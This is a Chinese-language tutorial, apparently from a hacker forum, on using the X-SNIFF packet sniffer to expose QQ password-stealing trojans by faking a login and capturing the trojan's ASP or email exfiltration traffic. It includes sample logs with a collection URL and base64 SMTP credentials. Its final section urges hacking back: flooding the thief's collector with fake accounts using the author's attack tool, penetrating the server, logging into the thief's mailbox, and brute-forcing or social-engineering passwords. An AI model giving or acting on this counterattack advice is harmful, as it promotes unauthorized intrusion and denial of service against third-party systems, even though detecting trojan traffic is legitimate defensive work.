如何冷静应对偷QQ程序

傲世九天

现在盗QQ的程序越做越好了。破坏锁后图标弄成和正常的一样。这就让人郁闷了

。

不过不要紧，让我来教你如何对付它！

首先准备好家伙

：X-SNIFF

进入X-SNIFF所在目录后

运行命令：xsniff -tcp -asc -pass -log qq.txt

===========================
小知识：
为什么要输入这命令呢？
-tcp
嗅探所有通过TCP协议传输的包

tcp嗅探模式最好配合-asc参数 以ASCII模式输出嗅探数据
这样像“阿拉”那些用ASP来收信的木马的收信地址就会被我们嗅到了！

-pass
嗅探密码

用此参数，可以嗅探到用EMAIL收信的QQ木马的相应EMAIL及帐号密码
===========================

然后打开QQ登陆窗口

随便输入一个QQ号和密码然后登陆

等出现正登陆的窗口时就可以关掉QQ了（当然，你也可以等到密码报错时关甚至使用真的QQ）

这时，不管是ASP收信还是EMAIL收信的盗QQ木马都会现出原形

例子1：

阿拉的ASP收信模式（嗅探结果）

POST /ald/tmdqq.asp HTTP/1.1

Accept: Accept: */*, /ald/tmdqq.asp, 192.168.0.6

Content-Type: application/x-www-form-urlencoded

User-Agent: MyApp

Host: http:// 192.168.0.6/ald/tmdqq.asp

Content-Length: 25

Cache-Control: no-cache

Cookie: ASPSESSIONIDCCTQCARD=GFNGKMAAILIKOIBLPJAOOFON

num=74444444&pass=netpatch

他的收信地址为：
http:// 192.168.0.6/ald/tmdqq.asp
收信参数为
num=74444444&pass=netpatch

提交模式为：
http:// 192.168.0.6/ald/tmdqq.asp?num=74444444&pass=netpatch

例子2：

阿拉的Email收信模式（嗅探结果）

TCP  192.168.0.77->202.108.5.141 Port: 1049->25

     Bytes=12 TTL=128 Len=80 ---PA-

AUTH LOGIN  

//请求登陆邮件服务器

TCP  202.108.5.141->192.168.0.77 Port: 25->1049

     Bytes=18 TTL=52 Len=80 ---PA-

334 dXNlcm5hbWU6  

//服务器要求输入用户名

TCP  192.168.0.77->202.108.5.141 Port: 1049->25

     Bytes=10 TTL=128 Len=80 ---PA-

dHJ5NHFx  

//盗贼的EMAIL的ID（base64加密）

TCP  202.108.5.141->192.168.0.77 Port: 25->1049

     Bytes=18 TTL=52 Len=80 ---PA-

334 UGFzc3dvcmQ6  

//服务器要求输入EMAIL登陆密码

TCP  192.168.0.77->202.108.5.141 Port: 1049->25

     Bytes=10 TTL=128 Len=80 ---PA-

NzQxODUy

//盗贼的EMAIL登陆密码（base64加密）

TCP  202.108.5.141->192.168.0.77 Port: 25->1049

     Bytes=31 TTL=52 Len=80 ---PA-

235 Authentication successful

//服务器反馈登陆成功标志

TCP  192.168.0.77->202.108.5.141 Port: 1049->25

     Bytes=29 TTL=128 Len=80 ---PA-

MAIL FROM: <xxx@xxx.com>

//QQ密码发信地址

TCP  202.108.5.141->192.168.0.77 Port: 25->1049

     Bytes=13 TTL=52 Len=80 ---PA-

250 Mail OK

//反馈设置信息

TCP  192.168.0.77->202.108.5.141 Port: 1049->25

     Bytes=27 TTL=128 Len=80 ---PA-

RCPT T <xxx@xxx.com>

//QQ密码收信地址

TCP  202.108.5.141->192.168.0.77 Port: 25->1049

     Bytes=13 TTL=52 Len=80 ---PA-

250 Mail OK

//反馈设置信息

TCP  192.168.0.77->202.108.5.141 Port: 1049->25

     Bytes=6 TTL=128 Len=80 ---PA-

DATA

TCP  202.108.5.141->192.168.0.77 Port: 25->1049

     Bytes=37 TTL=52 Len=80 ---PA-

354 End data with <CR><LF>.<CR><LF>

TCP  192.168.0.77->202.108.5.141 Port: 1049->25

     Bytes=345 TTL=128 Len=80 ---PA-

From: ................<xxxx@xxx.com>

T <xxxx@xxx.com>

Subject:77777----netpatch

//QQ号码和密码

Content-Type: text/html; charset="GB2312"

L9NTdhkmuwwx113368ACGHJLNQQSUW

<br>------------------------------

<br>....:77777

<br>....:netpatch

<br>------------------------------

<br>IP....:218.104.xxx.xxx

<br>........:................

这时，我们可以有2种方法对付这种偷QQ的

1。用我写的 啊拉ASP收信 攻击程序，发他几万个加QQ和密码过去让他试个爽

2。渗透那服务器。

对于EMAIL接收的，如果对方只用一个EMAIL，那就简单了，拿到密码和ID，你说能做什么呢？如果对方用两个EMAIL，就看你的运气啦，看看密码是否相同或相近？用社会工程学或爆破其密码！

再不行，还是一样，发一堆假的过去。或者再想别的办法。

其他的盗Q程序基本相同。我就不多说了。